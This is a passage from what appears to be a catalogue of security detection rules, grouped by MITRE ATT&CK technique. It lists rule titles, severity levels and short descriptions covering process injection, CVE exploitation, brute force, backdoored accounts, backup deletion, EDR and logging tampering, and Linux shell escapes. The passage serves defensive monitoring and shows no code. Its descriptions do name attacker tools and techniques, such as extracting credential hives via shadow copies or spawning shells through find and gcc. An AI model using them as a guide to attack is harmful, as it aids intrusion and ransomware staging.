  • System Information Discovery Using System_Profiler - Level: medium
    Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Kernel Dump Using Dtrace - Level: high
    Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff
  • HackTool - winPEAS Execution - Level: high
    Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Execution of Hostname - Level: low
    Description: Use of hostname to get information
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • PUA - System Informer Execution - Level: medium
    Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
  • Suspicious Query of MachineGUID - Level: low
    Description: Use of reg to get MachineGuid information
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Suspicious Execution of Systeminfo - Level: low
    Description: Detects usage of the "systeminfo" command to retrieve information
  • Uncommon System Information Discovery Via Wmic.EXE - Level: medium
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
  • System Disk And Volume Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
  • CMD Shell Output Redirect - Level: low
    Description: Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • System Information Discovery Via Wmic.EXE - Level: low
    Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
  • Domain User Enumeration Network Recon 01 - Level: medium
    Description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.t1055 31
Show Rules (31)
  • Rare Remote Thread Creation By Uncommon Source Image - Level: high
    Description: Detects uncommon processes creating remote threads.
  • Remote Thread Created In Shell Application - Level: medium
    Description: Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
  • Remote Thread Creation By Uncommon Source Image - Level: medium
    Description: Detects uncommon processes creating remote threads.
  • Created Files by Microsoft Sync Center - Level: medium
    Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
  • Potential DLL Sideloading Using Coregen.exe - Level: medium
    Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
  • DotNet CLR DLL Loaded By Scripting Applications - Level: high
    Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
  • Network Connection Initiated Via Notepad.EXE - Level: high
    Description: Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
  • Microsoft Sync Center Suspicious Network Connections - Level: medium
    Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
  • CobaltStrike Named Pipe - Level: critical
    Description: Detects the creation of a named pipe as used by CobaltStrike
  • CobaltStrike Named Pipe Pattern Regex - Level: critical
    Description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
  • CobaltStrike Named Pipe Patterns - Level: high
    Description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
  • HackTool - CoercedPotato Named Pipe Creation - Level: high
    Description: Detects the pattern of a pipe name as used by the hack tool CoercedPotato
  • HackTool - EfsPotato Named Pipe Creation - Level: high
    Description: Detects the pattern of a pipe name as used by the hack tool EfsPotato
  • Malicious Named Pipe Created - Level: critical
    Description: Detects the creation of a named pipe seen used by known APTs or malware.
  • PowerShell ShellCode - Level: high
    Description: Detects Base64 encoded Shellcode
  • Dllhost.EXE Execution Anomaly - Level: high
    Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
  • HackTool - CoercedPotato Execution - Level: high
    Description: Detects the use of CoercedPotato, a tool for privilege escalation
  • HackTool - DInjector PowerShell Cradle Execution - Level: critical
    Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
  • Potential Process Injection Via Msra.EXE - Level: high
    Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
  • Suspicious Rundll32 Invoking Inline VBScript - Level: high
    Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
  • Process Creation Using Sysnative Folder - Level: medium
    Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
  • Suspicious Userinit Child Process - Level: medium
    Description: Detects a suspicious child process of userinit
  • Suspect Svchost Activity - Level: high
    Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
  • Suspicious Child Process Of Wermgr.EXE - Level: high
    Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
  • Malware Shellcode in Verclsid Target Process - Level: high
    Description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex acitvity via specific process patterns
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection - Level: critical
    Description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
  • APT PRIVATELOG Image Load Pattern - Level: high
    Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity - Level: high
    Description: Detects the execution of installed GuLoader malware on the host. GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process.
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe - Level: high
    Description: Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
  • Potential Shellcode Injection - Level: medium
    Description: Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject.
attack.t1203 29
Show Rules (29)
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Antivirus Exploitation Framework Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Suspicious Invocation of Shell via Rsync - Level: high
    Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
  • Network Connection Initiated By Eqnedt32.EXE - Level: high
    Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
  • Office Application Initiated Network Connection To Non-Local IP - Level: medium
    Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
  • Java Running with Remote Debugging - Level: medium
    Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
  • Potentially Suspicious Child Process of KeyScrambler.exe - Level: medium
    Description: Detects potentially suspicious child processes of KeyScrambler.exe
  • Suspicious Spool Service Child Process - Level: high
    Description: Detects suspicious print spool service (spoolsv.exe) child processes.
  • Potentially Suspicious Child Process Of WinRAR.EXE - Level: medium
    Description: Detects potentially suspicious child processes of WinRAR.exe.
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
  • Dfsvc.EXE Network Connection To Non-Local IPs - Level: medium
    Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port - Level: high
    Description: Detects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
attack.t1110 28
Show Rules (28)
  • Brute Force - Level: medium
    Description: Detects many authentication failures from one source to one destination which is may indicate Brute Force activity
  • CrackMapExecWin - Level: critical
    Description: Detects CrackMapExecWin Activity as Described by NCSC
  • Password Spray Activity - Level: high
    Description: Indicates that a password spray attack has been successfully performed.
  • Account Lockout - Level: medium
    Description: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.
  • Successful Authentications From Countries You Do Not Operate Out Of - Level: medium
    Description: Detect successful authentications from countries you do not operate out of.
  • Failed Authentications From Countries You Do Not Operate Out Of - Level: low
    Description: Detect failed authentications from countries you do not operate out of.
  • Potential MFA Bypass Using Legacy Client Authentication - Level: high
    Description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
  • Sign-in Failure Due to Conditional Access Requirements Not Met - Level: high
    Description: Define a baseline threshold for failed sign-ins due to Conditional Access failures
  • Use of Legacy Authentication Protocols - Level: high
    Description: Alert on when legacy authentication has been used on an account
  • Multifactor Authentication Denied - Level: medium
    Description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
  • User Access Blocked by Azure Conditional Access - Level: medium
    Description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
  • Bitbucket User Login Failure - Level: medium
    Description: Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
  • Bitbucket User Login Failure Via SSH - Level: medium
    Description: Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
  • Hack Tool User Agent - Level: high
    Description: Detects suspicious user agent strings user by hack tools in proxy logs
  • MSSQL Server Failed Logon - Level: low
    Description: Detects failed logon attempts from clients to MSSQL server.
  • MSSQL Server Failed Logon From External Network - Level: medium
    Description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
  • NTLM Brute Force - Level: medium
    Description: Detects common NTLM brute force device names
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - Hydra Password Bruteforce Execution - Level: high
    Description: Detects command line parameters used by Hydra password guessing hack tool
  • Sign-in Failure Bad Password Threshold - Level: high
    Description: Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.
  • Failed Logins with Different Accounts from Single Source - Linux - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
attack.t1098 27
Show Rules (27)
  • AWS IAM Backdoor Users Keys - Level: medium
    Description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.
  • AWS Route 53 Domain Transfer Lock Disabled - Level: low
    Description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
  • AWS Route 53 Domain Transferred to Another Account - Level: low
    Description: Detects when a request has been made to transfer a Route 53 domain to another AWS account.
  • AWS User Login Profile Was Modified - Level: high
    Description: Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
  • Number Of Resource Creation Or Deployment Activities - Level: medium
    Description: Number of VM creations or deployment activities occur in Azure via the azureactivity log.
  • Change to Authentication Method - Level: medium
    Description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
  • Bulk Deletion Changes To Privileged Account Permissions - Level: high
    Description: Detects when a user is removed from a privileged role. Bulk changes should be investigated.
  • Anomalous User Activity - Level: high
    Description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.
  • Bitbucket Global Permission Changed - Level: medium
    Description: Detects global permissions change activity.
  • GCP Access Policy Deleted - Level: medium
    Description: Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
  • Google Workspace Granted Domain API Access - Level: medium
    Description: Detects when an API access service account is granted domain authority.
  • Google Workspace User Granted Admin Privileges - Level: medium
    Description: Detects when an Google Workspace user is granted admin privileges.
  • Privileged User Has Been Created - Level: high
    Description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
  • Cisco Local Accounts - Level: high
    Description: Find local accounts being created or modified as well as remote authentication configurations
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right - Level: high
    Description: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
  • Enabled User Right in AD to Control User Objects - Level: high
    Description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
  • Active Directory User Backdoors - Level: high
    Description: Detects scenarios where one can control another users or computers account without having to use their credentials.
  • A New Trust Was Created To A Domain - Level: medium
    Description: Addition of domains is seldom and should be verified for legitimacy.
  • Password Change on Directory Service Restore Mode (DSRM) Account - Level: high
    Description: Detects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence.
  • User Added to Local Administrator Group - Level: medium
    Description: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
  • A Member Was Removed From a Security-Enabled Global Group - Level: low
    Description: Detects activity when a member is removed from a security-enabled global group
  • A Member Was Added to a Security-Enabled Global Group - Level: low
    Description: Detects activity when a member is added to a security-enabled global group
  • A Security-Enabled Global Group Was Deleted - Level: low
    Description: Detects activity when a security-enabled global group is deleted
  • Powershell LocalAccount Manipulation - Level: medium
    Description: Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
  • User Added to Local Administrators Group - Level: medium
    Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
  • User Added To Highly Privileged Group - Level: high
    Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
attack.t1490 26
Show Rules (26)
  • AWS S3 Bucket Versioning Disable - Level: medium
    Description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS - Level: medium
    Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.
  • Time Machine Backup Disabled Via Tmutil - MacOS - Level: medium
    Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS - Level: medium
    Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
  • Cisco Modify Configuration - Level: medium
    Description: Modifications to a config that will serve an adversary's impacts or persistence
  • Backup Files Deleted - Level: medium
    Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
  • Suspicious Volume Shadow Copy Vssapi.dll Load - Level: high
    Description: Detects the image load of VSS DLL by uncommon executables
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load - Level: medium
    Description: Detects the image load of VSS DLL by uncommon executables
  • Suspicious Volume Shadow Copy VSS_PS.dll Load - Level: high
    Description: Detects the image load of vss_ps.dll by uncommon executables
  • Delete Volume Shadow Copies Via WMI With PowerShell - Level: high
    Description: Shadow Copies deletion using operating systems utilities via PowerShell
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script - Level: high
    Description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script - Level: high
    Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Boot Configuration Tampering Via Bcdedit.EXE - Level: high
    Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
  • Copy From VolumeShadowCopy Via Cmd.EXE - Level: high
    Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
  • Deletion of Volume Shadow Copies via WMI with PowerShell - Level: high
    Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
  • Sensitive File Access Via Volume Shadow Copy Backup - Level: high
    Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
  • Shadow Copies Deletion Using Operating Systems Utilities - Level: high
    Description: Shadow Copies deletion using operating systems utilities
  • All Backups Deleted Via Wbadmin.EXE - Level: high
    Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
  • Windows Backup Deleted Via Wbadmin.EXE - Level: medium
    Description: Detects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled.
  • File Recovery From Backup Via Wbadmin.EXE - Level: medium
    Description: Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.
  • Registry Disable System Restore - Level: high
    Description: Detects the modification of the registry to disable a system restore on the computer
  • New Root or CA or AuthRoot Certificate to Store - Level: medium
    Description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • Potential Dtrack RAT Activity - Level: critical
    Description: Detects potential Dtrack RAT activity via specific process patterns
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Amsi.DLL Load By Uncommon Process - Level: low
    Description: Detects loading of Amsi.dll by uncommon processes
attack.t1562 23
Show Rules (23)
  • AWS SecurityHub Findings Evasion - Level: high
    Description: Detects the modification of the findings on SecurityHub.
  • Azure Kubernetes Events Deleted - Level: medium
    Description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
  • Google Cloud Firewall Modified or Deleted - Level: medium
    Description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
  • ETW Logging Disabled In .NET Processes - Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • HackTool - EDRSilencer Execution - Filter Added - Level: high
    Description: Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary - Level: high
    Description: Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.
  • Sysmon Application Crashed - Level: high
    Description: Detects application popup reporting a failure of the Sysmon service
  • Windows Defender Exclusions Added - PowerShell - Level: medium
    Description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detect filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
  • HackTool - EDRSilencer Execution - Level: high
    Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
  • Windows Firewall Disabled via PowerShell - Level: medium
    Description: Detects attempts to disable the Windows Firewall using PowerShell
  • Write Protect For Storage Disabled - Level: medium
    Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • ETW Logging Tamper In .NET Processes Via CommandLine - Level: high
    Description: Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • Removal Of Index Value to Hide Schedule Task - Registry - Level: medium
    Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
  • Removal Of SD Value to Hide Schedule Task - Registry - Level: medium
    Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
  • ETW Logging Disabled In .NET Processes - Sysmon Registry - Level: high
    Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
  • Hide Schedule Task Via Index Value Tamper - Level: high
    Description: Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
  • ETW Logging Disabled For rpcrt4.dll - Level: low
    Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
  • ETW Logging Disabled For SCM - Level: low
    Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
  • Diamond Sleet APT Scheduled Task Creation - Registry - Level: high
    Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
  • Terminate Linux Process Via Kill - Level: medium
    Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
attack.t1083 22
Show Rules (22)
  • Powershell File and Directory Discovery - Level: low
    Description: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
  • Shell Invocation via Apt - Linux - Level: medium
    Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Capabilities Discovery - Linux - Level: low
    Description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
  • File and Directory Discovery - Linux - Level: informational
    Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
  • Shell Execution via Find - Linux - Level: high
    Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
  • Shell Execution via Flock - Linux - Level: high
    Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Shell Execution GCC - Linux - Level: high
    Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Shell Execution via Nice - Linux - Level: high
    Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Potential Discovery Activity Using Find - Linux - Level: medium
    Description: Detects usage of "find" binary in a suspicious manner to perform discovery
  • Vim GTFOBin Abuse - Linux - Level: high
